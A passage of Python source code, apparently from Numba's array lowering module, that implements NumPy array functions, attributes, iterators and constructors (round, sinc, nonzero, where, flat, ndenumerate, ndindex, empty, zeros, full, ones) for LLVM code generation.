types.Kind(types.Array))
def array_round(context, builder, sig, args):
def array_round_impl(arr, decimals, out):
if arr.shape != out.shape:
raise ValueError("invalid output shape")
for index, val in numpy.ndenumerate(arr):
out[index] = numpy.round(val, decimals)
return out
res = context.compile_internal(builder, array_round_impl, sig, args)
return impl_ret_new_ref(context, builder, sig.return_type, res)
@builtin
@implement(numpy.sinc, types.Kind(types.Array))
def array_sinc(context, builder, sig, args):
def array_sinc_impl(arr):
out = numpy.zeros_like(arr)
for index, val in numpy.ndenumerate(arr):
out[index] = numpy.sinc(val)
return out
res = context.compile_internal(builder, array_sinc_impl, sig, args)
return impl_ret_new_ref(context, builder, sig.return_type, res)
@builtin
@implement(numpy.sinc, types.Kind(types.Number))
def scalar_sinc(context, builder, sig, args):
scalar_dtype = sig.return_type
def scalar_sinc_impl(val):
if numpy.fabs(val) == 0.e0: # to match np impl
val = 1e-20
val *= numpy.pi # np sinc is the normalised variant
return numpy.sin(val)/val
res = context.compile_internal(builder, scalar_sinc_impl, sig, args,
locals=dict(c=scalar_dtype))
return impl_ret_untracked(context, builder, sig.return_type, res)
@builtin
@implement(numpy.nonzero, types.Kind(types.Array))
@implement("array.nonzero", types.Kind(types.Array))
@implement(numpy.where, types.Kind(types.Array))
def array_nonzero(context, builder, sig, args):
aryty = sig.args[0]
# Return type is a N-tuple of 1D C-contiguous arrays
retty = sig.return_type
outaryty = retty.dtype
ndim = aryty.ndim
nouts = retty.count
ary = make_array(aryty)(context, builder, args[0])
shape = cgutils.unpack_tuple(builder, ary.shape)
strides = cgutils.unpack_tuple(builder, ary.strides)
data = ary.data
layout = aryty.layout
# First count the number of non-zero elements
zero = context.get_constant(types.intp, 0)
one = context.get_constant(types.intp, 1)
count = cgutils.alloca_once_value(builder, zero)
with cgutils.loop_nest(builder, shape, zero.type) as indices:
ptr = cgutils.get_item_pointer2(builder, data, shape, strides,
layout, indices)
val = load_item(context, builder, aryty, ptr)
nz = context.is_true(builder, aryty.dtype, val)
with builder.if_then(nz):
builder.store(builder.add(builder.load(count), one), count)
# Then allocate output arrays of the right size
out_shape = (builder.load(count),)
outs = [_empty_nd_impl(context, builder, outaryty, out_shape)._getvalue()
for i in range(nouts)]
outarys = [make_array(outaryty)(context, builder, out) for out in outs]
out_datas = [out.data for out in outarys]
# And fill them up
index = cgutils.alloca_once_value(builder, zero)
with cgutils.loop_nest(builder, shape, zero.type) as indices:
ptr = cgutils.get_item_pointer2(builder, data, shape, strides,
layout, indices)
val = load_item(context, builder, aryty, ptr)
nz = context.is_true(builder, aryty.dtype, val)
with builder.if_then(nz):
# Store element indices in output arrays
if not indices:
# For a 0-d array, store 0 in the unique output array
indices = (zero,)
cur = builder.load(index)
for i in range(nouts):
ptr = cgutils.get_item_pointer2(builder, out_datas[i],
out_shape, (),
'C', [cur])
store_item(context, builder, outaryty, indices[i], ptr)
builder.store(builder.add(cur, one), index)
tup = context.make_tuple(builder, sig.return_type, outs)
return impl_ret_new_ref(context, builder, sig.return_type, tup)
@builtin
@implement(numpy.where, types.Kind(types.Array),
types.Kind(types.Array), types.Kind(types.Array))
def array_where(context, builder, sig, args):
layouts = set(a.layout for a in sig.args)
if layouts == set('C'):
# Faster implementation for C-contiguous arrays
def where_impl(cond, x, y):
shape = cond.shape
if x.shape != shape or y.shape != shape:
raise ValueError("all inputs should have the same shape")
res = numpy.empty_like(x)
cf = cond.flat
xf = x.flat
yf = y.flat
rf = res.flat
for i in range(cond.size):
rf[i] = xf[i] if cf[i] else yf[i]
return res
else:
def where_impl(cond, x, y):
shape = cond.shape
if x.shape != shape or y.shape != shape:
raise ValueError("all inputs should have the same shape")
res = numpy.empty_like(x)
for idx, c in numpy.ndenumerate(cond):
res[idx] = x[idx] if c else y[idx]
return res
res = context.compile_internal(builder, where_impl, sig, args)
return impl_ret_untracked(context, builder, sig.return_type, res)
#-------------------------------------------------------------------------------
# Array attributes
@builtin_attr
@impl_attribute(types.Kind(types.Array), "dtype", types.Kind(types.DType))
def array_dtype(context, builder, typ, value):
res = context.get_dummy_value()
return impl_ret_untracked(context, builder, typ, res)
@builtin_attr
@impl_attribute(types.Kind(types.Array), "shape", types.Kind(types.UniTuple))
@impl_attribute(types.Kind(types.MemoryView), "shape", types.Kind(types.UniTuple))
def array_shape(context, builder, typ, value):
arrayty = make_array(typ)
array = arrayty(context, builder, value)
res = array.shape
return impl_ret_untracked(context, builder, typ, res)
@builtin_attr
@impl_attribute(types.Kind(types.Array), "strides", types.Kind(types.UniTuple))
@impl_attribute(types.Kind(types.MemoryView), "strides", types.Kind(types.UniTuple))
def array_strides(context, builder, typ, value):
arrayty = make_array(typ)
array = arrayty(context, builder, value)
res = array.strides
return impl_ret_untracked(context, builder, typ, res)
@builtin_attr
@impl_attribute(types.Kind(types.Array), "ndim", types.intp)
@impl_attribute(types.Kind(types.MemoryView), "ndim", types.intp)
def array_ndim(context, builder, typ, value):
res = context.get_constant(types.intp, typ.ndim)
return impl_ret_untracked(context, builder, typ, res)
@builtin_attr
@impl_attribute(types.Kind(types.Array), "size", types.intp)
def array_size(context, builder, typ, value):
arrayty = make_array(typ)
array = arrayty(context, builder, value)
res = array.nitems
return impl_ret_untracked(context, builder, typ, res)
@builtin_attr
@impl_attribute(types.Kind(types.Array), "itemsize", types.intp)
@impl_attribute(types.Kind(types.MemoryView), "itemsize", types.intp)
def array_itemsize(context, builder, typ, value):
arrayty = make_array(typ)
array = arrayty(context, builder, value)
res = array.itemsize
return impl_ret_untracked(context, builder, typ, res)
@builtin_attr
@impl_attribute(types.Kind(types.MemoryView), "nbytes", types.intp)
def array_nbytes(context, builder, typ, value):
"""
nbytes = size * itemsize
"""
arrayty = make_array(typ)
array = arrayty(context, builder, value)
dims = cgutils.unpack_tuple(builder, array.shape, typ.ndim)
res = builder.mul(array.nitems, array.itemsize)
return impl_ret_untracked(context, builder, typ, res)
@builtin_attr
@impl_attribute(types.Kind(types.MemoryView), "contiguous", types.boolean)
def array_contiguous(context, builder, typ, value):
res = context.get_constant(types.boolean, typ.is_contig)
return impl_ret_untracked(context, builder, typ, res)
@builtin_attr
@impl_attribute(types.Kind(types.MemoryView), "c_contiguous", types.boolean)
def array_c_contiguous(context, builder, typ, value):
res = context.get_constant(types.boolean, typ.is_c_contig)
return impl_ret_untracked(context, builder, typ, res)
@builtin_attr
@impl_attribute(types.Kind(types.MemoryView), "f_contiguous", types.boolean)
def array_f_contiguous(context, builder, typ, value):
res = context.get_constant(types.boolean, typ.is_f_contig)
return impl_ret_untracked(context, builder, typ, res)
@builtin_attr
@impl_attribute(types.Kind(types.MemoryView), "readonly", types.boolean)
def array_readonly(context, builder, typ, value):
res = context.get_constant(types.boolean, not typ.mutable)
return impl_ret_untracked(context, builder, typ, res)
@builtin_attr
@impl_attribute(types.Kind(types.Array), "ctypes",
types.Kind(types.ArrayCTypes))
def array_ctypes(context, builder, typ, value):
arrayty = make_array(typ)
array = arrayty(context, builder, value)
# Cast void* data to uintp
addr = builder.ptrtoint(array.data, context.get_value_type(types.uintp))
# Create new ArrayCType structure
ctinfo_type = cgutils.create_struct_proxy(types.ArrayCTypes(typ))
ctinfo = ctinfo_type(context, builder)
ctinfo.data = addr
res = ctinfo._getvalue()
return impl_ret_untracked(context, builder, typ, res)
@builtin_attr
@impl_attribute(types.Kind(types.Array), "flags", types.Kind(types.ArrayFlags))
def array_flags(context, builder, typ, value):
res = context.get_dummy_value()
return impl_ret_untracked(context, builder, typ, res)
@builtin_attr
@impl_attribute(types.Kind(types.ArrayCTypes), "data", types.uintp)
def array_ctypes_data(context, builder, typ, value):
ctinfo_type = cgutils.create_struct_proxy(typ)
ctinfo = ctinfo_type(context, builder, value=value)
res = ctinfo.data
return impl_ret_untracked(context, builder, typ, res)
@builtin_attr
@impl_attribute(types.Kind(types.ArrayFlags), "contiguous", types.boolean)
@impl_attribute(types.Kind(types.ArrayFlags), "c_contiguous", types.boolean)
def array_ctypes_data(context, builder, typ, value):
val = typ.array_type.layout == 'C'
res = context.get_constant(types.boolean, val)
return impl_ret_untracked(context, builder, typ, res)
@builtin_attr
@impl_attribute(types.Kind(types.ArrayFlags), "f_contiguous", types.boolean)
def array_ctypes_data(context, builder, typ, value):
layout = typ.array_type.layout
val = layout == 'F' if typ.array_type.ndim > 1 else layout in 'CF'
res = context.get_constant(types.boolean, val)
return impl_ret_untracked(context, builder, typ, res)
@builtin_attr
@impl_attribute_generic(types.Kind(types.Array))
def array_record_getattr(context, builder, typ, value, attr):
"""
Generic getattr() implementation for record arrays: fetch the given
record member, i.e. a subarray.
"""
arrayty = make_array(typ)
array = arrayty(context, builder, value)
rectype = typ.dtype
if not isinstance(rectype, types.Record):
raise AttributeError("attribute %r of %s not defined" % (attr, typ))
dtype = rectype.typeof(attr)
offset = rectype.offset(attr)
resty = typ.copy(dtype=dtype, layout='A')
raryty = make_array(resty)
rary = raryty(context, builder)
constoffset = context.get_constant(types.intp, offset)
llintp = context.get_value_type(types.intp)
newdata = builder.add(builder.ptrtoint(array.data, llintp), constoffset)
newdataptr = builder.inttoptr(newdata, rary.data.type)
datasize = context.get_abi_sizeof(context.get_data_type(dtype))
populate_array(rary,
data=newdataptr,
shape=array.shape,
strides=array.strides,
itemsize=context.get_constant(types.intp, datasize),
meminfo=array.meminfo,
parent=array.parent)
res = rary._getvalue()
return impl_ret_borrowed(context, builder, typ, res)
#-------------------------------------------------------------------------------
# Comparisons
@builtin
@implement('is', types.Kind(types.Array), types.Kind(types.Array))
def array_is(context, builder, sig, args):
aty, bty = sig.args
if aty != bty:
return cgutils.false_bit
def array_is_impl(a, b):
return (a.shape == b.shape and
a.strides == b.strides and
a.ctypes.data == b.ctypes.data)
return context.compile_internal(builder, array_is_impl, sig, args)
#-------------------------------------------------------------------------------
# builtin `numpy.flat` implementation
def make_array_flat_cls(flatiterty):
"""
Return the Structure representation of the given *flatiterty* (an
instance of types.NumpyFlatType).
"""
return _make_flattening_iter_cls(flatiterty, 'flat')
def make_array_ndenumerate_cls(nditerty):
"""
Return the Structure representation of the given *nditerty* (an
instance of types.NumpyNdEnumerateType).
"""
return _make_flattening_iter_cls(nditerty, 'ndenumerate')
def _increment_indices(context, builder, ndim, shape, indices, end_flag=None):
zero = context.get_constant(types.intp, 0)
one = context.get_constant(types.intp, 1)
bbend = builder.append_basic_block('end_increment')
if end_flag is not None:
builder.store(cgutils.false_byte, end_flag)
for dim in reversed(range(ndim)):
idxptr = cgutils.gep_inbounds(builder, indices, dim)
idx = increment_index(builder, builder.load(idxptr))
count = shape[dim]
in_bounds = builder.icmp(lc.ICMP_SLT, idx, count)
with cgutils.if_likely(builder, in_bounds):
builder.store(idx, idxptr)
builder.branch(bbend)
builder.store(zero, idxptr)
if end_flag is not None:
builder.store(cgutils.true_byte, end_flag)
builder.branch(bbend)
builder.position_at_end(bbend)
def _increment_indices_array(context, builder, arrty, arr, indices, end_flag=None):
shape = cgutils.unpack_tuple(builder, arr.shape, arrty.ndim)
_increment_indices(context, builder, arrty.ndim, shape, indices, end_flag)
def make_ndindex_cls(nditerty):
"""
Return the Structure representation of the given *nditerty* (an
instance of types.NumpyNdIndexType).
"""
ndim = nditerty.ndim
class NdIndexIter(cgutils.create_struct_proxy(nditerty)):
"""
.ndindex() implementation.
"""
def init_specific(self, context, builder, shapes):
zero = context.get_constant(types.intp, 0)
indices = cgutils.alloca_once(builder, zero.type,
size=context.get_constant(types.intp,
ndim))
exhausted = cgutils.alloca_once_value(builder, cgutils.false_byte)
for dim in range(ndim):
idxptr = cgutils.gep_inbounds(builder, indices, dim)
builder.store(zero, idxptr)
# 0-sized dimensions really indicate an empty array,
# but we have to catch that condition early to avoid
# a bug inside the iteration logic.
dim_size = shapes[dim]
dim_is_empty = builder.icmp(lc.ICMP_EQ, dim_size, zero)
with cgutils.if_unlikely(builder, dim_is_empty):
builder.store(cgutils.true_byte, exhausted)
self.indices = indices
self.exhausted = exhausted
self.shape = cgutils.pack_array(builder, shapes, zero.type)
def iternext_specific(self, context, builder, result):
zero = context.get_constant(types.intp, 0)
one = context.get_constant(types.intp, 1)
bbend = builder.append_basic_block('end')
exhausted = cgutils.as_bool_bit(builder, builder.load(self.exhausted))
with cgutils.if_unlikely(builder, exhausted):
result.set_valid(False)
builder.branch(bbend)
indices = [builder.load(cgutils.gep_inbounds(builder, self.indices, dim))
for dim in range(ndim)]
for load in indices:
mark_positive(builder, load)
result.yield_(cgutils.pack_array(builder, indices, zero.type))
result.set_valid(True)
shape = cgutils.unpack_tuple(builder, self.shape, ndim)
_increment_indices(context, builder, ndim, shape,
self.indices, self.exhausted)
builder.branch(bbend)
builder.position_at_end(bbend)
return NdIndexIter
def _make_flattening_iter_cls(flatiterty, kind):
assert kind in ('flat', 'ndenumerate')
array_type = flatiterty.array_type
dtype = array_type.dtype
if array_type.layout == 'C':
class CContiguousFlatIter(cgutils.create_struct_proxy(flatiterty)):
"""
.flat() / .ndenumerate() implementation for C-contiguous arrays.
"""
def init_specific(self, context, builder, arrty, arr):
zero = context.get_constant(types.intp, 0)
self.index = cgutils.alloca_once_value(builder, zero)
# We can't trust strides[-1] to always contain the right
# step value, see
# http://docs.scipy.org/doc/numpy-dev/release.html#npy-relaxed-strides-checking
self.stride = arr.itemsize
if kind == 'ndenumerate':
# Zero-initialize the indices array.
indices = cgutils.alloca_once(
builder, zero.type,
size=context.get_constant(types.intp, arrty.ndim))
for dim in range(arrty.ndim):
idxptr = cgutils.gep_inbounds(builder, indices, dim)
builder.store(zero, idxptr)
self.indices = indices
# NOTE: Using gep() instead of explicit pointer addition helps
# LLVM vectorize the loop (since the stride is known and
# constant). This is not possible in the non-contiguous case,
# where the strides are unknown at compile-time.
def iternext_specific(self, context, builder, arrty, arr, result):
zero = context.get_constant(types.intp, 0)
one = context.get_constant(types.intp, 1)
ndim = arrty.ndim
nitems = arr.nitems
index = builder.load(self.index)
is_valid = builder.icmp(lc.ICMP_SLT, index, nitems)
result.set_valid(is_valid)
with cgutils.if_likely(builder, is_valid):
ptr = builder.gep(arr.data, [index])
value = load_item(context, builder, arrty, ptr)
if kind == 'flat':
result.yield_(value)
else:
# ndenumerate(): fetch and increment indices
indices = self.indices
idxvals = [builder.load(cgutils.gep_inbounds(builder, indices, dim))
for dim in range(ndim)]
idxtuple = cgutils.pack_array(builder, idxvals)
result.yield_(
cgutils.make_anonymous_struct(builder, [idxtuple, value]))
_increment_indices_array(context, builder, arrty, arr, indices)
index = builder.add(index, one)
builder.store(index, self.index)
def getitem(self, context, builder, arrty, arr, index):
ptr = builder.gep(arr.data, [index])
return load_item(context, builder, arrty, ptr)
def setitem(self, context, builder, arrty, arr, index, value):
ptr = builder.gep(arr.data, [index])
store_item(context, builder, arrty, value, ptr)
return CContiguousFlatIter
else:
class FlatIter(cgutils.create_struct_proxy(flatiterty)):
"""
Generic .flat() / .ndenumerate() implementation for
non-contiguous arrays.
It keeps track of pointers along each dimension in order to
minimize computations.
"""
def init_specific(self, context, builder, arrty, arr):
zero = context.get_constant(types.intp, 0)
data = arr.data
ndim = arrty.ndim
shapes = cgutils.unpack_tuple(builder, arr.shape, ndim)
indices = cgutils.alloca_once(builder, zero.type,
size=context.get_constant(types.intp,
arrty.ndim))
pointers = cgutils.alloca_once(builder, data.type,
size=context.get_constant(types.intp,
arrty.ndim))
strides = cgutils.unpack_tuple(builder, arr.strides, ndim)
exhausted = cgutils.alloca_once_value(builder, cgutils.false_byte)
# Initialize indices and pointers with their start values.
for dim in range(ndim):
idxptr = cgutils.gep_inbounds(builder, indices, dim)
ptrptr = cgutils.gep_inbounds(builder, pointers, dim)
builder.store(data, ptrptr)
builder.store(zero, idxptr)
# 0-sized dimensions really indicate an empty array,
# but we have to catch that condition early to avoid
# a bug inside the iteration logic (see issue #846).
dim_size = shapes[dim]
dim_is_empty = builder.icmp(lc.ICMP_EQ, dim_size, zero)
with cgutils.if_unlikely(builder, dim_is_empty):
builder.store(cgutils.true_byte, exhausted)
self.indices = indices
self.pointers = pointers
self.exhausted = exhausted
def iternext_specific(self, context, builder, arrty, arr, result):
ndim = arrty.ndim
data = arr.data
shapes = cgutils.unpack_tuple(builder, arr.shape, ndim)
strides = cgutils.unpack_tuple(builder, arr.strides, ndim)
indices = self.indices
pointers = self.pointers
zero = context.get_constant(types.intp, 0)
one = context.get_constant(types.intp, 1)
bbend = builder.append_basic_block('end')
# Catch already computed iterator exhaustion
is_exhausted = cgutils.as_bool_bit(
builder, builder.load(self.exhausted))
with cgutils.if_unlikely(builder, is_exhausted):
result.set_valid(False)
builder.branch(bbend)
result.set_valid(True)
# Current pointer inside last dimension
last_ptr = cgutils.gep_inbounds(builder, pointers, ndim - 1)
ptr = builder.load(last_ptr)
value = load_item(context, builder, arrty, ptr)
if kind == 'flat':
result.yield_(value)
else:
# ndenumerate() => yield (indices, value)
idxvals = [builder.load(cgutils.gep_inbounds(builder, indices, dim))
for dim in range(ndim)]
idxtuple = cgutils.pack_array(builder, idxvals)
result.yield_(
cgutils.make_anonymous_struct(builder, [idxtuple, value]))
# Update indices and pointers by walking from inner
# dimension to outer.
for dim in reversed(range(ndim)):
idxptr = cgutils.gep_inbounds(builder, indices, dim)
idx = builder.add(builder.load(idxptr), one)
count = shapes[dim]
stride = strides[dim]
in_bounds = builder.icmp(lc.ICMP_SLT, idx, count)
with cgutils.if_likely(builder, in_bounds):
# Index is valid => pointer can simply be incremented.
builder.store(idx, idxptr)
ptrptr = cgutils.gep_inbounds(builder, pointers, dim)
ptr = builder.load(ptrptr)
ptr = cgutils.pointer_add(builder, ptr, stride)
builder.store(ptr, ptrptr)
# Reset pointers in inner dimensions
for inner_dim in range(dim + 1, ndim):
ptrptr = cgutils.gep_inbounds(builder, pointers, inner_dim)
builder.store(ptr, ptrptr)
builder.branch(bbend)
# Reset index and continue with next dimension
builder.store(zero, idxptr)
# End of array
builder.store(cgutils.true_byte, self.exhausted)
builder.branch(bbend)
builder.position_at_end(bbend)
def _ptr_for_index(self, context, builder, arrty, arr, index):
ndim = arrty.ndim
shapes = cgutils.unpack_tuple(builder, arr.shape, count=ndim)
strides = cgutils.unpack_tuple(builder, arr.strides, count=ndim)
# First convert the flattened index into a regular n-dim index
indices = []
for dim in reversed(range(ndim)):
indices.append(builder.urem(index, shapes[dim]))
index = builder.udiv(index, shapes[dim])
indices.reverse()
ptr = cgutils.get_item_pointer2(builder, arr.data, shapes,
strides, arrty.layout, indices)
return ptr
def getitem(self, context, builder, arrty, arr, index):
ptr = self._ptr_for_index(context, builder, arrty, arr, index)
return load_item(context, builder, arrty, ptr)
def setitem(self, context, builder, arrty, arr, index, value):
ptr = self._ptr_for_index(context, builder, arrty, arr, index)
store_item(context, builder, arrty, value, ptr)
return FlatIter
@builtin_attr
@impl_attribute(types.Kind(types.Array), "flat", types.Kind(types.NumpyFlatType))
def make_array_flatiter(context, builder, arrty, arr):
flatitercls = make_array_flat_cls(types.NumpyFlatType(arrty))
flatiter = flatitercls(context, builder)
arrayptr = cgutils.alloca_once_value(builder, arr)
flatiter.array = arrayptr
arrcls = context.make_array(arrty)
arr = arrcls(context, builder, ref=arrayptr)
flatiter.init_specific(context, builder, arrty, arr)
res = flatiter._getvalue()
return impl_ret_borrowed(context, builder, types.NumpyFlatType(arrty), res)
@builtin
@implement('iternext', types.Kind(types.NumpyFlatType))
@iternext_impl
def iternext_numpy_flatiter(context, builder, sig, args, result):
[flatiterty] = sig.args
[flatiter] = args
flatitercls = make_array_flat_cls(flatiterty)
flatiter = flatitercls(context, builder, value=flatiter)
arrty = flatiterty.array_type
arrcls = context.make_array(arrty)
arr = arrcls(context, builder, value=builder.load(flatiter.array))
flatiter.iternext_specific(context, builder, arrty, arr, result)
@builtin
@implement('getitem', types.Kind(types.NumpyFlatType), types.Kind(types.Integer))
def iternext_numpy_getitem(context, builder, sig, args):
flatiterty = sig.args[0]
flatiter, index = args
flatitercls = make_array_flat_cls(flatiterty)
flatiter = flatitercls(context, builder, value=flatiter)
arrty = flatiterty.array_type
arrcls = context.make_array(arrty)
arr = arrcls(context, builder, value=builder.load(flatiter.array))
res = flatiter.getitem(context, builder, arrty, arr, index)
return impl_ret_borrowed(context, builder, sig.return_type, res)
@builtin
@implement('setitem', types.Kind(types.NumpyFlatType), types.Kind(types.Integer),
types.Any)
def iternext_numpy_getitem(context, builder, sig, args):
flatiterty = sig.args[0]
flatiter, index, value = args
flatitercls = make_array_flat_cls(flatiterty)
flatiter = flatitercls(context, builder, value=flatiter)
arrty = flatiterty.array_type
arrcls = context.make_array(arrty)
arr = arrcls(context, builder, value=builder.load(flatiter.array))
res = flatiter.setitem(context, builder, arrty, arr, index, value)
return context.get_dummy_value()
@builtin
@implement(numpy.ndenumerate, types.Kind(types.Array))
def make_array_ndenumerate(context, builder, sig, args):
arrty, = sig.args
arr, = args
nditercls = make_array_ndenumerate_cls(types.NumpyNdEnumerateType(arrty))
nditer = nditercls(context, builder)
arrayptr = cgutils.alloca_once_value(builder, arr)
nditer.array = arrayptr
arrcls = context.make_array(arrty)
arr = arrcls(context, builder, ref=arrayptr)
nditer.init_specific(context, builder, arrty, arr)
res = nditer._getvalue()
return impl_ret_borrowed(context, builder, sig.return_type, res)
@builtin
@implement('iternext', types.Kind(types.NumpyNdEnumerateType))
@iternext_impl
def iternext_numpy_nditer(context, builder, sig, args, result):
[nditerty] = sig.args
[nditer] = args
nditercls = make_array_ndenumerate_cls(nditerty)
nditer = nditercls(context, builder, value=nditer)
arrty = nditerty.array_type
arrcls = context.make_array(arrty)
arr = arrcls(context, builder, value=builder.load(nditer.array))
nditer.iternext_specific(context, builder, arrty, arr, result)
@builtin
@implement(numpy.ndindex, types.VarArg(types.Kind(types.Integer)))
def make_array_ndindex(context, builder, sig, args):
"""ndindex(*shape)"""
shape = [context.cast(builder, arg, argty, types.intp)
for argty, arg in zip(sig.args, args)]
nditercls = make_ndindex_cls(types.NumpyNdIndexType(len(shape)))
nditer = nditercls(context, builder)
nditer.init_specific(context, builder, shape)
res = nditer._getvalue()
return impl_ret_borrowed(context, builder, sig.return_type, res)
@builtin
@implement(numpy.ndindex, types.Kind(types.BaseTuple))
def make_array_ndindex(context, builder, sig, args):
"""ndindex(shape)"""
ndim = sig.return_type.ndim
if ndim > 0:
idxty = sig.args[0].dtype
tup = args[0]
shape = cgutils.unpack_tuple(builder, tup, ndim)
shape = [context.cast(builder, idx, idxty, types.intp)
for idx in shape]
else:
shape = []
nditercls = make_ndindex_cls(types.NumpyNdIndexType(len(shape)))
nditer = nditercls(context, builder)
nditer.init_specific(context, builder, shape)
res = nditer._getvalue()
return impl_ret_borrowed(context, builder, sig.return_type, res)
@builtin
@implement('iternext', types.Kind(types.NumpyNdIndexType))
@iternext_impl
def iternext_numpy_ndindex(context, builder, sig, args, result):
[nditerty] = sig.args
[nditer] = args
nditercls = make_ndindex_cls(nditerty)
nditer = nditercls(context, builder, value=nditer)
nditer.iternext_specific(context, builder, result)
# -----------------------------------------------------------------------------
# Numpy array constructors
def _empty_nd_impl(context, builder, arrtype, shapes):
"""Utility function used for allocating a new array during LLVM code
generation (lowering). Given a target context, builder, array
type, and a tuple or list of lowered dimension sizes, returns a
LLVM value pointing at a Numba runtime allocated array.
"""
arycls = make_array(arrtype)
ary = arycls(context, builder)
datatype = context.get_data_type(arrtype.dtype)
itemsize = context.get_constant(types.intp,
context.get_abi_sizeof(datatype))
# compute array length
arrlen = context.get_constant(types.intp, 1)
for s in shapes:
arrlen = builder.mul(arrlen, s)
if arrtype.ndim == 0:
strides = ()
elif arrtype.layout == 'C':
strides = [itemsize]
for dimension_size in reversed(shapes[1:]):
strides.append(builder.mul(strides[-1], dimension_size))
strides = tuple(reversed(strides))
elif arrtype.layout == 'F':
strides = [itemsize]
for dimension_size in shapes[:-1]:
strides.append(builder.mul(strides[-1], dimension_size))
strides = tuple(strides)
else:
raise NotImplementedError(
"Don't know how to allocate array with layout '{0}'.".format(
arrtype.layout))
allocsize = builder.mul(itemsize, arrlen)
# NOTE: AVX prefer 32-byte alignment
meminfo = context.nrt_meminfo_alloc_aligned(builder, size=allocsize,
align=32)
data = context.nrt_meminfo_data(builder, meminfo)
intp_t = context.get_value_type(types.intp)
shape_array = cgutils.pack_array(builder, shapes, ty=intp_t)
strides_array = cgutils.pack_array(builder, strides, ty=intp_t)
populate_array(ary,
data=builder.bitcast(data, datatype.as_pointer()),
shape=shape_array,
strides=strides_array,
itemsize=itemsize,
meminfo=meminfo)
return ary
def _zero_fill_array(context, builder, ary):
"""
Zero-fill an array. The array must be contiguous.
"""
cgutils.memset(builder, ary.data, builder.mul(ary.itemsize, ary.nitems), 0)
def _parse_empty_args(context, builder, sig, args):
"""
Parse the arguments of a np.empty(), np.zeros() or np.ones() call.
"""
arrshapetype = sig.args[0]
arrshape = args[0]
arrtype = sig.return_type
if isinstance(arrshapetype, types.Integer):
ndim = 1
shapes = [context.cast(builder, arrshape, arrshapetype, types.intp)]
else:
ndim = arrshapetype.count
arrshape = context.cast(builder, arrshape, arrshapetype,
types.UniTuple(types.intp, ndim))
shapes = cgutils.unpack_tuple(builder, arrshape, count=ndim)
zero = context.get_constant_generic(builder, types.intp, 0)
for dim in range(ndim):
is_neg = builder.icmp_signed('<', shapes[dim], zero)
with cgutils.if_unlikely(builder, is_neg):
context.call_conv.return_user_exc(builder, ValueError,
("negative dimensions not allowed",))
return arrtype, shapes
def _parse_empty_like_args(context, builder, sig, args):
"""
Parse the arguments of a np.empty_like(), np.zeros_like() or
np.ones_like() call.
"""
arytype = sig.args[0]
ary = make_array(arytype)(context, builder, value=args[0])
shapes = cgutils.unpack_tuple(builder, ary.shape, count=arytype.ndim)
return sig.return_type, shapes
@builtin
@implement(numpy.empty, types.Any)
@implement(numpy.empty, types.Any, types.Any)
def numpy_empty_nd(context, builder, sig, args):
arrtype, shapes = _parse_empty_args(context, builder, sig, args)
ary = _empty_nd_impl(context, builder, arrtype, shapes)
return impl_ret_new_ref(context, builder, sig.return_type, ary._getvalue())
@builtin
@implement(numpy.empty_like, types.Kind(types.Array))
@implement(numpy.empty_like, types.Kind(types.Array), types.Kind(types.DTypeSpec))
def numpy_empty_like_nd(context, builder, sig, args):
arrtype, shapes = _parse_empty_like_args(context, builder, sig, args)
ary = _empty_nd_impl(context, builder, arrtype, shapes)
return impl_ret_new_ref(context, builder, sig.return_type, ary._getvalue())
@builtin
@implement(numpy.zeros, types.Any)
@implement(numpy.zeros, types.Any, types.Any)
def numpy_zeros_nd(context, builder, sig, args):
arrtype, shapes = _parse_empty_args(context, builder, sig, args)
ary = _empty_nd_impl(context, builder, arrtype, shapes)
_zero_fill_array(context, builder, ary)
return impl_ret_new_ref(context, builder, sig.return_type, ary._getvalue())
@builtin
@implement(numpy.zeros_like, types.Kind(types.Array))
@implement(numpy.zeros_like, types.Kind(types.Array), types.Kind(types.DTypeSpec))
def numpy_zeros_like_nd(context, builder, sig, args):
arrtype, shapes = _parse_empty_like_args(context, builder, sig, args)
ary = _empty_nd_impl(context, builder, arrtype, shapes)
_zero_fill_array(context, builder, ary)
return impl_ret_new_ref(context, builder, sig.return_type, ary._getvalue())
if numpy_version >= (1, 8):
@builtin
@implement(numpy.full, types.Any, types.Any)
def numpy_full_nd(context, builder, sig, args):
def full(shape, value):
arr = numpy.empty(shape)
for idx in numpy.ndindex(arr.shape):
arr[idx] = value
return arr
res = context.compile_internal(builder, full, sig, args)
return impl_ret_new_ref(context, builder, sig.return_type, res)
@builtin
@implement(numpy.full, types.Any, types.Any, types.Kind(types.DTypeSpec))
def numpy_full_dtype_nd(context, builder, sig, args):
def full(shape, value, dtype):
arr = numpy.empty(shape, dtype)
for idx in numpy.ndindex(arr.shape):
arr[idx] = value
return arr
res = context.compile_internal(builder, full, sig, args)
return impl_ret_new_ref(context, builder, sig.return_type, res)
@builtin
@implement(numpy.full_like, types.Kind(types.Array), types.Any)
def numpy_full_like_nd(context, builder, sig, args):
def full_like(arr, value):
arr = numpy.empty_like(arr)
for idx in numpy.ndindex(arr.shape):
arr[idx] = value
return arr
res = context.compile_internal(builder, full_like, sig, args)
return impl_ret_new_ref(context, builder, sig.return_type, res)
@builtin
@implement(numpy.full_like, types.Kind(types.Array), types.Any, types.Kind(types.DTypeSpec))
def numpy_full_like_nd(context, builder, sig, args):
def full_like(arr, value, dtype):
arr = numpy.empty_like(arr, dtype)
for idx in numpy.ndindex(arr.shape):
arr[idx] = value
return arr
res = context.compile_internal(builder, full_like, sig, args)
return impl_ret_new_ref(context, builder, sig.return_type, res)
@builtin
@implement(numpy.ones, types.Any)
def numpy_ones_nd(context, builder, sig, args):
def ones(shape):
arr = numpy.empty(shape)
for idx in numpy.ndindex(arr.shape):
arr[idx] = 1
return arr
valty = sig.return_type.dtype
res = context.compile_internal(builder, ones, sig, args,
locals={'c': valty})
return impl_ret_new_ref(context, builder, sig.return_type, res)
@builtin
@implement(numpy.ones, types.Any, types.Kind(types.DTypeSpec))
def numpy_ones_dtype_nd(context, builder, sig, args):
def ones(shape, dtype):
arr = numpy.empty(shape, dtype)
for idx in numpy.ndindex(arr.shape):
arr[idx] = 1
return arr
res = context.compile_internal(builder, ones, sig, args)
return impl_ret_new_ref(context, builder, sig.return_type, res)
@builtin
@implement(numpy.ones_like, types.Kind(types.Array))
def numpy_ones_like_nd(context, builder, sig, args):
def ones_like(arr):
arr = numpy.empty_like(arr)
for idx in numpy.ndindex(arr.shape):
arr[idx] = 1
return arr
res = context.compile_internal(builder, ones_like, sig, args)
return impl_ret_new_ref(context, builder, sig.return_type, res)
@builtin
@implement(numpy.ones_like, types.Kind(types.Array), types.Kind(types.DTypeSpec))
def numpy_ones_like_dtype_nd(context, builder, sig, args):
def ones_like(arr, dtype):
